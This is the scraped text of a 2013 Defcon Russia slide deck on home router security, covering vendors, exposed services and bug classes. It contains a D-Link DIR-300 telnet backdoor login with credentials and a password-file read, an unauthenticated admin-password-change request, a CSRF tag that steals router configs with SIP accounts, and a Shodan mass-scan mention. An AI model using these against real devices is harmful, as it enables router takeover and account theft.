27
Home router security @090h @cherboff DCG #7812 10/08/2013

Home router security

  • Upload
    marlow

  • View
    54

  • Download
    0

Embed Size (px)

DESCRIPTION

Home router security. @090h @ cherboff DCG #7812 10 /0 8 /201 3. .:VENDORS:. VENDORZ = [‘D-Link’, ‘TP-Link’, ‘ASUS’, ‘ ZyXEL ’, ‘ NetGear ’, ‘ Cisco Linksys ’, … ]. .:SERVICES:. SERVICES = [ HTTP, TELNET, SSH, DNS, UPNDP, DHCP, - PowerPoint PPT Presentation

Citation preview

Page 1: Home  router security

Home router security

@090h

@cherboff

DCG #781210/08/2013

Page 2: Home  router security

Defcon Russia (DCG #7812) 2

.:VENDORS:.

VENDORZ = [ ‘D-Link’, ‘TP-Link’, ‘ASUS’,‘ZyXEL’, ‘NetGear’,‘Cisco Linksys’,…

]

Page 3: Home  router security

Defcon Russia (DCG #7812) 3

.:SERVICES:.

SERVICES = [HTTP, TELNET, SSH, DNS,UPNDP, DHCP,TFTP 4 RECOVERY, ]

Page 4: Home  router security

Defcon Russia (DCG #7812) 4

.:BUGZ:.

ROUTER_VULN_TYPES = [ WPS,COMMAND_INJECTION, PLAIN_TEXT_PASSWORDS,INFO_LEAK,BUFFER_OVERFLOW,AUTH_BYPASS,CSRF, XSS,VENDOR_BACKDORS,]

Page 5: Home  router security

Defcon Russia (DCG #7812) 5

MEANWHILE IN RUSSIAZyXEL.popular

Page 6: Home  router security

Defcon Russia (DCG #7812) 6

MEANWHILE IN RUSSIA TP-Link.popular

Page 7: Home  router security

Defcon Russia (DCG #7812) 7

MEANWHILE IN RUSSIAD-Link.popular

Page 8: Home  router security

Defcon Russia (DCG #7812) 8

TP-Link.XSSED

Page 9: Home  router security

Defcon Russia (DCG #7812) 9

DIR-300? REALY??!!

Page 10: Home  router security

Defcon Russia (DCG #7812) 10

WPAPSK.default = 76543210

Page 11: Home  router security

Defcon Russia (DCG #7812) 11

D-Link.telnet_backd00r

telnet 192.168.1.1 login: Alphanetworks password: wrgn23_dlwbr_dir300b cat /var/etc/httpasswd

Page 12: Home  router security

Defcon Russia (DCG #7812) 12

.:REAL_GAME_RULES:.

DEFAULT_AUTH= { ‘admin’: [‘admin’, ‘1234’]}USERS_NEVER_UPDATE = TrueANTIVIRUS_SOFTWATE = NoneONEBUG_EXPLOIT_TARGETS = [

‘D-Link’, ‘NetGear’, ‘Cisco Linksys’]PLATFOTM = {‘ARCH’: ‘MIPS’, ‘OS’: ‘LiNUX’}UID = 0

Page 13: Home  router security

Defcon Russia (DCG #7812) 13

Dir300.no_auth_password_change

POST http://192.168.1.1:80/tools_admin.php HTTP/1.1 Host: 192.168.1.2 Keep-Alive: 115 Content-Type: application/x-www-form-urlencoded Content-length: 0

ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name=admin&admin_password1=uhOHahEh

Page 14: Home  router security

Defcon Russia (DCG #7812) 14

ONE_BUG_ARMY

/*

Text

*/

Page 15: Home  router security

Defcon Russia (DCG #7812) 15

ONE_BUG_ARMY

/*

Text

*/

Page 16: Home  router security

Defcon Russia (DCG #7812) 16

DIR300.py + SHODAN

Page 17: Home  router security

Defcon Russia (DCG #7812) 17

Yet one CSRF story

Page 18: Home  router security

Defcon Russia (DCG #7812) 18

D-Link DPN-5402admin/admin…

Page 19: Home  router security

19

Wooot?

Defcon Russia (DCG #7812)

Page 20: Home  router security

Defcon Russia (DCG #7812) 20

YES!CSRF?

Page 21: Home  router security

Defcon Russia (DCG #7812) 21

Evil Plan.Evil WEB site

CSRF

Evil FTP server

Config

Page 22: Home  router security

Defcon Russia (DCG #7812) 22

<IMG src=“http://192.168.0.1/goform/cbBackupCfg...

3xplo1T ;-)

Page 23: Home  router security

23

• Network conf• Usless stuff conf

• PPPOE account• SIP account

Defcon Russia (DCG #7812)

Config

Page 24: Home  router security

24Defcon Russia (DCG #7812)

Telephony

2-12-85-06

2-12-85-06

2-12-85-06

2-12-85-06

2-12-85-06

2-12-85-06

2-12-85-06

Page 25: Home  router security

25

• SIP account• Not attached 2 device

• Can be used anywhere• Stealed via stupid CSRF

Defcon Russia (DCG #7812)

Phone number is

Page 26: Home  router security

26

fin.

Defcon Russia (DCG #7812)

Page 27: Home  router security

27

$>Questions?

Defcon Russia (DCG #7812)